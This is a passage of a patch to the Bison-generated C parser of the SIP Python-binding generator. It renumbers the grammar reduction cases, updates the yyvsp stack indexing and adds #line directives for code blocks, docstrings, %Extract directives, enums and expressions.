++ case 257: /* modhdrcode: TK_MODHEADERCODE codeblock */ ++#line 2298 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->hdrcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->hdrcode, (yyvsp[0].codeb)); + } ++#line 4877 "../parser.c" + break; + +- case 257: +-#line 2278 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 258: /* typehdrcode: TK_TYPEHEADERCODE codeblock */ ++#line 2304 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4885 "../parser.c" + break; + +- case 258: +-#line 2283 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 259: /* travcode: TK_TRAVERSECODE codeblock */ ++#line 2309 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4893 "../parser.c" + break; + +- case 259: +-#line 2288 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 260: /* clearcode: TK_CLEARCODE codeblock */ ++#line 2314 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4901 "../parser.c" + break; + +- case 260: +-#line 2293 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 261: /* getbufcode: TK_GETBUFFERCODE codeblock */ ++#line 2319 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4909 "../parser.c" + break; + +- case 261: +-#line 2298 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 262: /* releasebufcode: TK_RELEASEBUFFERCODE codeblock */ ++#line 2324 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4917 "../parser.c" + break; + +- case 262: +-#line 2303 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 263: /* readbufcode: TK_READBUFFERCODE codeblock */ ++#line 2329 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4925 "../parser.c" + break; + +- case 263: +-#line 2308 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 264: /* writebufcode: TK_WRITEBUFFERCODE codeblock */ ++#line 2334 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4933 "../parser.c" + break; + +- case 264: +-#line 2313 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 265: /* segcountcode: TK_SEGCOUNTCODE codeblock */ ++#line 2339 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4941 "../parser.c" + break; + +- case 265: +-#line 2318 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 266: /* charbufcode: TK_CHARBUFFERCODE codeblock */ ++#line 2344 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4949 "../parser.c" + break; + +- case 266: +-#line 2323 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 267: /* instancecode: TK_INSTANCECODE codeblock */ ++#line 2349 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4957 "../parser.c" + break; + +- case 267: +-#line 2328 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 268: /* picklecode: TK_PICKLECODE codeblock */ ++#line 2354 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4965 "../parser.c" + break; + +- case 268: +-#line 2333 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 269: /* finalcode: TK_FINALCODE codeblock */ ++#line 2359 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4973 "../parser.c" + break; + +- case 269: +-#line 2338 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 270: /* modcode: TK_MODCODE codeblock */ ++#line 2364 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->cppcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->cppcode, (yyvsp[0].codeb)); + } ++#line 4982 "../parser.c" + break; + +- case 270: +-#line 2344 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 271: /* typecode: TK_TYPECODE codeblock */ ++#line 2370 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4990 "../parser.c" + break; + +- case 271: +-#line 2349 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 272: /* preinitcode: TK_PREINITCODE codeblock */ ++#line 2375 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->preinitcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->preinitcode, (yyvsp[0].codeb)); + } ++#line 4999 "../parser.c" + break; + +- case 272: +-#line 2355 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 273: /* initcode: TK_INITCODE codeblock */ ++#line 2381 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->initcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->initcode, (yyvsp[0].codeb)); + } ++#line 5008 "../parser.c" + break; + +- case 273: +-#line 2361 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 274: /* postinitcode: TK_POSTINITCODE codeblock */ ++#line 2387 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->postinitcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->postinitcode, (yyvsp[0].codeb)); + } ++#line 5017 "../parser.c" + break; + +- case 274: +-#line 2367 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 275: /* unitcode: TK_UNITCODE codeblock */ ++#line 2393 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->unitcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->unitcode, (yyvsp[0].codeb)); + } ++#line 5026 "../parser.c" + break; + +- case 275: +-#line 2373 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 276: /* unitpostinccode: TK_UNITPOSTINCLUDECODE codeblock */ ++#line 2399 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->unitpostinccode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->unitpostinccode, (yyvsp[0].codeb)); + } ++#line 5035 "../parser.c" + break; + +- case 276: +-#line 2379 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 277: /* prepycode: TK_PREPYCODE codeblock */ ++#line 2405 "parser.y" ++ { + /* Deprecated. */ + } ++#line 5043 "../parser.c" + break; + +- case 277: +-#line 2384 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 278: /* exptypehintcode: TK_EXPTYPEHINTCODE codeblock */ ++#line 2410 "parser.y" ++ { + if (notSkipping() && !inMainModule()) +- appendCodeBlock(¤tSpec->exptypehintcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->exptypehintcode, (yyvsp[0].codeb)); + } ++#line 5052 "../parser.c" + break; + +- case 278: +-#line 2390 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 279: /* modtypehintcode: TK_TYPEHINTCODE codeblock */ ++#line 2416 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->typehintcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->typehintcode, (yyvsp[0].codeb)); + } ++#line 5061 "../parser.c" + break; + +- case 279: +-#line 2396 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 280: /* classtypehintcode: TK_TYPEHINTCODE codeblock */ ++#line 2422 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 5069 "../parser.c" + break; + +- case 280: +-#line 2401 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 281: /* doc: TK_DOC codeblock */ ++#line 2427 "parser.y" ++ { + if (notSkipping() && inMainModule()) +- appendCodeBlock(¤tSpec->docs, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->docs, (yyvsp[0].codeb)); + } ++#line 5078 "../parser.c" + break; + +- case 281: +-#line 2407 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 282: /* exporteddoc: TK_EXPORTEDDOC codeblock */ ++#line 2433 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tSpec->docs, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->docs, (yyvsp[0].codeb)); + } ++#line 5087 "../parser.c" + break; + +- case 282: +-#line 2413 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 283: /* autopyname: TK_AUTOPYNAME autopyname_args */ ++#line 2439 "parser.y" ++ { + if (notSkipping()) +- addAutoPyName(currentModule, (yyvsp[(2) - (2)].autopyname).remove_leading); ++ addAutoPyName(currentModule, (yyvsp[0].autopyname).remove_leading); + } ++#line 5096 "../parser.c" + break; + +- case 283: +-#line 2419 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.autopyname) = (yyvsp[(2) - (3)].autopyname); ++ case 284: /* autopyname_args: '(' autopyname_arg_list ')' */ ++#line 2445 "parser.y" ++ { ++ (yyval.autopyname) = (yyvsp[-1].autopyname); + } ++#line 5104 "../parser.c" + break; + +- case 285: +-#line 2425 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.autopyname) = (yyvsp[(1) - (3)].autopyname); ++ case 286: /* autopyname_arg_list: autopyname_arg_list ',' autopyname_arg */ ++#line 2451 "parser.y" ++ { ++ (yyval.autopyname) = (yyvsp[-2].autopyname); + +- switch ((yyvsp[(3) - (3)].autopyname).token) ++ switch ((yyvsp[0].autopyname).token) + { +- case TK_REMOVELEADING: (yyval.autopyname).remove_leading = (yyvsp[(3) - (3)].autopyname).remove_leading; break; ++ case TK_REMOVELEADING: (yyval.autopyname).remove_leading = (yyvsp[0].autopyname).remove_leading; break; + } + } ++#line 5117 "../parser.c" + break; + +- case 286: +-#line 2435 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 287: /* autopyname_arg: TK_REMOVELEADING '=' TK_STRING_VALUE */ ++#line 2461 "parser.y" ++ { + (yyval.autopyname).token = TK_REMOVELEADING; + +- (yyval.autopyname).remove_leading = (yyvsp[(3) - (3)].text); ++ (yyval.autopyname).remove_leading = (yyvsp[0].text); + } ++#line 5127 "../parser.c" + break; + +- case 287: +-#line 2442 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 288: /* docstring: TK_DOCSTRING docstring_args codeblock */ ++#line 2468 "parser.y" ++ { + (yyval.docstr) = sipMalloc(sizeof(docstringDef)); + +- (yyval.docstr)->signature = (yyvsp[(2) - (3)].docstring).signature; +- (yyval.docstr)->text = (yyvsp[(3) - (3)].codeb)->frag; +- free((yyvsp[(3) - (3)].codeb)); ++ (yyval.docstr)->signature = (yyvsp[-1].docstring).signature; ++ (yyval.docstr)->text = (yyvsp[0].codeb)->frag; ++ free((yyvsp[0].codeb)); + + /* Format the docstring. */ +- if ((yyvsp[(2) - (3)].docstring).format == deindented) ++ if ((yyvsp[-1].docstring).format == deindented) + { + const char *cp; + char *dp; +@@ -5392,159 +5210,175 @@ yyreduce: + *dp = '\0'; + } + } ++#line 5214 "../parser.c" + break; + +- case 288: +-#line 2526 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 289: /* docstring_args: %empty */ ++#line 2552 "parser.y" ++ { + (yyval.docstring).format = currentModule->defdocstringfmt; + (yyval.docstring).signature = currentModule->defdocstringsig; + } ++#line 5223 "../parser.c" + break; + +- case 289: +-#line 2530 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 290: /* docstring_args: TK_STRING_VALUE */ ++#line 2556 "parser.y" ++ { + resetLexerState(); + +- (yyval.docstring).format = convertFormat((yyvsp[(1) - (1)].text)); ++ (yyval.docstring).format = convertFormat((yyvsp[0].text)); + (yyval.docstring).signature = currentModule->defdocstringsig; + } ++#line 5234 "../parser.c" + break; + +- case 290: +-#line 2536 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.docstring) = (yyvsp[(2) - (3)].docstring); ++ case 291: /* docstring_args: '(' docstring_arg_list ')' */ ++#line 2562 "parser.y" ++ { ++ (yyval.docstring) = (yyvsp[-1].docstring); + } ++#line 5242 "../parser.c" + break; + +- case 292: +-#line 2542 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.docstring) = (yyvsp[(1) - (3)].docstring); ++ case 293: /* docstring_arg_list: docstring_arg_list ',' docstring_arg */ ++#line 2568 "parser.y" ++ { ++ (yyval.docstring) = (yyvsp[-2].docstring); + +- switch ((yyvsp[(3) - (3)].docstring).token) ++ switch ((yyvsp[0].docstring).token) + { +- case TK_FORMAT: (yyval.docstring).format = (yyvsp[(3) - (3)].docstring).format; break; +- case TK_SIGNATURE: (yyval.docstring).signature = (yyvsp[(3) - (3)].docstring).signature; break; ++ case TK_FORMAT: (yyval.docstring).format = (yyvsp[0].docstring).format; break; ++ case TK_SIGNATURE: (yyval.docstring).signature = (yyvsp[0].docstring).signature; break; + } + } ++#line 5256 "../parser.c" + break; + +- case 293: +-#line 2553 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 294: /* docstring_arg: TK_FORMAT '=' TK_STRING_VALUE */ ++#line 2579 "parser.y" ++ { + (yyval.docstring).token = TK_FORMAT; + +- (yyval.docstring).format = convertFormat((yyvsp[(3) - (3)].text)); ++ (yyval.docstring).format = convertFormat((yyvsp[0].text)); + (yyval.docstring).signature = currentModule->defdocstringsig; + } ++#line 5267 "../parser.c" + break; + +- case 294: +-#line 2559 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 295: /* docstring_arg: TK_SIGNATURE '=' TK_STRING_VALUE */ ++#line 2585 "parser.y" ++ { + (yyval.docstring).token = TK_SIGNATURE; + + (yyval.docstring).format = currentModule->defdocstringfmt; +- (yyval.docstring).signature = convertSignature((yyvsp[(3) - (3)].text)); ++ (yyval.docstring).signature = convertSignature((yyvsp[0].text)); + } ++#line 5278 "../parser.c" + break; + +- case 295: +-#line 2567 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 296: /* optdocstring: %empty */ ++#line 2593 "parser.y" ++ { + (yyval.docstr) = NULL; + } ++#line 5286 "../parser.c" + break; + +- case 297: +-#line 2573 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].extract).id == NULL) ++ case 298: /* extract: TK_EXTRACT extract_args codeblock */ ++#line 2599 "parser.y" ++ { ++ if ((yyvsp[-1].extract).id == NULL) + yyerror("%Extract must have an 'id' argument"); + + if (notSkipping()) +- addExtractPart(currentSpec, (yyvsp[(2) - (3)].extract).id, (yyvsp[(2) - (3)].extract).order, (yyvsp[(3) - (3)].codeb)); ++ addExtractPart(currentSpec, (yyvsp[-1].extract).id, (yyvsp[-1].extract).order, (yyvsp[0].codeb)); + } ++#line 5298 "../parser.c" + break; + +- case 298: +-#line 2582 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 299: /* extract_args: TK_NAME_VALUE */ ++#line 2608 "parser.y" ++ { + resetLexerState(); + +- (yyval.extract).id = (yyvsp[(1) - (1)].text); ++ (yyval.extract).id = (yyvsp[0].text); + (yyval.extract).order = -1; + } ++#line 5309 "../parser.c" + break; + +- case 299: +-#line 2588 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.extract) = (yyvsp[(2) - (3)].extract); ++ case 300: /* extract_args: '(' extract_arg_list ')' */ ++#line 2614 "parser.y" ++ { ++ (yyval.extract) = (yyvsp[-1].extract); + } ++#line 5317 "../parser.c" + break; + +- case 301: +-#line 2594 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.extract) = (yyvsp[(1) - (3)].extract); ++ case 302: /* extract_arg_list: extract_arg_list ',' extract_arg */ ++#line 2620 "parser.y" ++ { ++ (yyval.extract) = (yyvsp[-2].extract); + +- switch ((yyvsp[(3) - (3)].extract).token) ++ switch ((yyvsp[0].extract).token) + { +- case TK_ID: (yyval.extract).id = (yyvsp[(3) - (3)].extract).id; break; +- case TK_ORDER: (yyval.extract).order = (yyvsp[(3) - (3)].extract).order; break; ++ case TK_ID: (yyval.extract).id = (yyvsp[0].extract).id; break; ++ case TK_ORDER: (yyval.extract).order = (yyvsp[0].extract).order; break; + } + } ++#line 5331 "../parser.c" + break; + +- case 302: +-#line 2605 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 303: /* extract_arg: TK_ID '=' TK_NAME_VALUE */ ++#line 2631 "parser.y" ++ { + (yyval.extract).token = TK_ID; + +- (yyval.extract).id = (yyvsp[(3) - (3)].text); ++ (yyval.extract).id = (yyvsp[0].text); + (yyval.extract).order = -1; + } ++#line 5342 "../parser.c" + break; + +- case 303: +-#line 2611 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 304: /* extract_arg: TK_ORDER '=' TK_NUMBER_VALUE */ ++#line 2637 "parser.y" ++ { + (yyval.extract).token = TK_ORDER; + +- if ((yyvsp[(3) - (3)].number) < 0) ++ if ((yyvsp[0].number) < 0) + yyerror("The 'order' of an %Extract directive must not be negative"); + + (yyval.extract).id = NULL; +- (yyval.extract).order = (yyvsp[(3) - (3)].number); ++ (yyval.extract).order = (yyvsp[0].number); + } ++#line 5356 "../parser.c" + break; + +- case 304: +-#line 2622 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 305: /* makefile: TK_MAKEFILE TK_PATH_VALUE optfilename codeblock */ ++#line 2648 "parser.y" ++ { + /* Deprecated. */ + } ++#line 5364 "../parser.c" + break; + +- case 307: +-#line 2631 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(1) - (2)].codeb); ++ case 308: /* codelines: codelines TK_CODELINE */ ++#line 2657 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[-1].codeb); + +- append(&(yyval.codeb)->frag, (yyvsp[(2) - (2)].codeb)->frag); ++ append(&(yyval.codeb)->frag, (yyvsp[0].codeb)->frag); + +- free((yyvsp[(2) - (2)].codeb)->frag); +- free((yyvsp[(2) - (2)].codeb)); ++ free((yyvsp[0].codeb)->frag); ++ free((yyvsp[0].codeb)); + } ++#line 5377 "../parser.c" + break; + +- case 308: +-#line 2641 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 309: /* $@9: %empty */ ++#line 2667 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -5554,72 +5388,80 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(4) - (4)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + if (sectionFlags != 0 && (sectionFlags & ~(SECT_IS_PUBLIC | SECT_IS_PROT)) != 0) + yyerror("Class enums must be in the public or protected sections"); + +- if (currentSpec->genc && (yyvsp[(2) - (4)].boolean)) ++ if (currentSpec->genc && (yyvsp[-2].boolean)) + yyerror("Scoped enums not allowed in a C module"); + + currentEnum = newEnum(currentSpec, currentModule, +- currentMappedType, (yyvsp[(3) - (4)].text), &(yyvsp[(4) - (4)].optflags), sectionFlags, (yyvsp[(2) - (4)].boolean)); ++ currentMappedType, (yyvsp[-1].text), &(yyvsp[0].optflags), sectionFlags, (yyvsp[-2].boolean)); + } + } ++#line 5404 "../parser.c" + break; + +- case 310: +-#line 2665 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 311: /* optenumkey: %empty */ ++#line 2691 "parser.y" ++ { + (yyval.boolean) = FALSE; + } ++#line 5412 "../parser.c" + break; + +- case 311: +-#line 2668 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 312: /* optenumkey: TK_CLASS */ ++#line 2694 "parser.y" ++ { + (yyval.boolean) = TRUE; + } ++#line 5420 "../parser.c" + break; + +- case 312: +-#line 2671 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 313: /* optenumkey: TK_STRUCT */ ++#line 2697 "parser.y" ++ { + (yyval.boolean) = TRUE; + } ++#line 5428 "../parser.c" + break; + +- case 313: +-#line 2676 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 314: /* optfilename: %empty */ ++#line 2702 "parser.y" ++ { + (yyval.text) = NULL; + } ++#line 5436 "../parser.c" + break; + +- case 314: +-#line 2679 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.text) = (yyvsp[(1) - (1)].text); ++ case 315: /* optfilename: TK_PATH_VALUE */ ++#line 2705 "parser.y" ++ { ++ (yyval.text) = (yyvsp[0].text); + } ++#line 5444 "../parser.c" + break; + +- case 315: +-#line 2684 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 316: /* optname: %empty */ ++#line 2710 "parser.y" ++ { + (yyval.text) = NULL; + } ++#line 5452 "../parser.c" + break; + +- case 316: +-#line 2687 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.text) = (yyvsp[(1) - (1)].text); ++ case 317: /* optname: TK_NAME_VALUE */ ++#line 2713 "parser.y" ++ { ++ (yyval.text) = (yyvsp[0].text); + } ++#line 5460 "../parser.c" + break; + +- case 323: +-#line 2702 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 324: /* enumline: TK_NAME_VALUE optenumassign optflags optcomma */ ++#line 2728 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -5630,15 +5472,15 @@ yyreduce: + + enumMemberDef *emd, **tail; + +- checkAnnos(&(yyvsp[(3) - (4)].optflags), annos); ++ checkAnnos(&(yyvsp[-1].optflags), annos); + + /* Note that we don't use the assigned value. */ + emd = sipMalloc(sizeof (enumMemberDef)); + + emd->pyname = cacheName(currentSpec, +- getPythonName(currentModule, &(yyvsp[(3) - (4)].optflags), (yyvsp[(1) - (4)].text))); +- emd->cname = (yyvsp[(1) - (4)].text); +- emd->no_typehint = getNoTypeHint(&(yyvsp[(3) - (4)].optflags)); ++ getPythonName(currentModule, &(yyvsp[-1].optflags), (yyvsp[-3].text))); ++ emd->cname = (yyvsp[-3].text); ++ emd->no_typehint = getNoTypeHint(&(yyvsp[-1].optflags)); + emd->ed = currentEnum; + emd->platforms = currentPlatforms; + emd->next = NULL; +@@ -5661,309 +5503,345 @@ yyreduce: + setIsUsedName(emd->pyname); + } + } ++#line 5507 "../parser.c" + break; + +- case 328: +-#line 2754 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 329: /* optassign: %empty */ ++#line 2780 "parser.y" ++ { + (yyval.valp) = NULL; + } ++#line 5515 "../parser.c" + break; + +- case 329: +-#line 2757 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.valp) = (yyvsp[(2) - (2)].valp); ++ case 330: /* optassign: '=' expr */ ++#line 2783 "parser.y" ++ { ++ (yyval.valp) = (yyvsp[0].valp); + } ++#line 5523 "../parser.c" + break; + +- case 331: +-#line 2763 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 332: /* expr: expr binop value */ ++#line 2789 "parser.y" ++ { + valueDef *vd; + +- if ((yyvsp[(1) - (3)].valp) -> vtype == string_value || (yyvsp[(3) - (3)].valp) -> vtype == string_value) ++ if ((yyvsp[-2].valp) -> vtype == string_value || (yyvsp[0].valp) -> vtype == string_value) + yyerror("Invalid binary operator for string"); + + /* Find the last value in the existing expression. */ + +- for (vd = (yyvsp[(1) - (3)].valp); vd -> next != NULL; vd = vd -> next) ++ for (vd = (yyvsp[-2].valp); vd -> next != NULL; vd = vd -> next) + ; + +- vd -> vbinop = (yyvsp[(2) - (3)].qchar); +- vd -> next = (yyvsp[(3) - (3)].valp); ++ vd -> vbinop = (yyvsp[-1].qchar); ++ vd -> next = (yyvsp[0].valp); + +- (yyval.valp) = (yyvsp[(1) - (3)].valp); ++ (yyval.valp) = (yyvsp[-2].valp); + } ++#line 5544 "../parser.c" + break; + +- case 332: +-#line 2781 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 333: /* binop: '-' */ ++#line 2807 "parser.y" ++ { + (yyval.qchar) = '-'; + } ++#line 5552 "../parser.c" + break; + +- case 333: +-#line 2784 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 334: /* binop: '+' */ ++#line 2810 "parser.y" ++ { + (yyval.qchar) = '+'; + } ++#line 5560 "../parser.c" + break; + +- case 334: +-#line 2787 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 335: /* binop: '*' */ ++#line 2813 "parser.y" ++ { + (yyval.qchar) = '*'; + } ++#line 5568 "../parser.c" + break; + +- case 335: +-#line 2790 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 336: /* binop: '/' */ ++#line 2816 "parser.y" ++ { + (yyval.qchar) = '/'; + } ++#line 5576 "../parser.c" + break; + +- case 336: +-#line 2793 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 337: /* binop: '&' */ ++#line 2819 "parser.y" ++ { + (yyval.qchar) = '&'; + } ++#line 5584 "../parser.c" + break; + +- case 337: +-#line 2796 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 338: /* binop: '|' */ ++#line 2822 "parser.y" ++ { + (yyval.qchar) = '|'; + } ++#line 5592 "../parser.c" + break; + +- case 338: +-#line 2801 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 339: /* optunop: %empty */ ++#line 2827 "parser.y" ++ { + (yyval.qchar) = '\0'; + } ++#line 5600 "../parser.c" + break; + +- case 339: +-#line 2804 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 340: /* optunop: '!' */ ++#line 2830 "parser.y" ++ { + (yyval.qchar) = '!'; + } ++#line 5608 "../parser.c" + break; + +- case 340: +-#line 2807 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 341: /* optunop: '~' */ ++#line 2833 "parser.y" ++ { + (yyval.qchar) = '~'; + } ++#line 5616 "../parser.c" + break; + +- case 341: +-#line 2810 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 342: /* optunop: '-' */ ++#line 2836 "parser.y" ++ { + (yyval.qchar) = '-'; + } ++#line 5624 "../parser.c" + break; + +- case 342: +-#line 2813 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 343: /* optunop: '+' */ ++#line 2839 "parser.y" ++ { + (yyval.qchar) = '+'; + } ++#line 5632 "../parser.c" + break; + +- case 343: +-#line 2816 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 344: /* optunop: '*' */ ++#line 2842 "parser.y" ++ { + (yyval.qchar) = '*'; + } ++#line 5640 "../parser.c" + break; + +- case 344: +-#line 2819 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 345: /* optunop: '&' */ ++#line 2845 "parser.y" ++ { + (yyval.qchar) = '&'; + } ++#line 5648 "../parser.c" + break; + +- case 345: +-#line 2824 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].qchar) != '\0' && (yyvsp[(3) - (3)].value).vtype == string_value) ++ case 346: /* value: optcast optunop simplevalue */ ++#line 2850 "parser.y" ++ { ++ if ((yyvsp[-1].qchar) != '\0' && (yyvsp[0].value).vtype == string_value) + yyerror("Invalid unary operator for string"); + + /* Convert the value to a simple expression on the heap. */ + (yyval.valp) = sipMalloc(sizeof (valueDef)); + +- *(yyval.valp) = (yyvsp[(3) - (3)].value); +- (yyval.valp)->vunop = (yyvsp[(2) - (3)].qchar); ++ *(yyval.valp) = (yyvsp[0].value); ++ (yyval.valp)->vunop = (yyvsp[-1].qchar); + (yyval.valp)->vbinop = '\0'; +- (yyval.valp)->cast = (yyvsp[(1) - (3)].scpvalp); ++ (yyval.valp)->cast = (yyvsp[-2].scpvalp); + (yyval.valp)->next = NULL; + } ++#line 5666 "../parser.c" + break; + +- case 346: +-#line 2839 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 347: /* optcast: %empty */ ++#line 2865 "parser.y" ++ { + (yyval.scpvalp) = NULL; + } ++#line 5674 "../parser.c" + break; + +- case 347: +-#line 2842 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.scpvalp) = (yyvsp[(2) - (3)].scpvalp); ++ case 348: /* optcast: '(' scopedname ')' */ ++#line 2868 "parser.y" ++ { ++ (yyval.scpvalp) = (yyvsp[-1].scpvalp); + } ++#line 5682 "../parser.c" + break; + +- case 348: +-#line 2847 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 349: /* scopedname: TK_SCOPE scopednamehead */ ++#line 2873 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Scoped names are not allowed in a C module"); + +- (yyval.scpvalp) = scopeScopedName(NULL, (yyvsp[(2) - (2)].scpvalp)); ++ (yyval.scpvalp) = scopeScopedName(NULL, (yyvsp[0].scpvalp)); + } ++#line 5693 "../parser.c" + break; + +- case 351: +-#line 2857 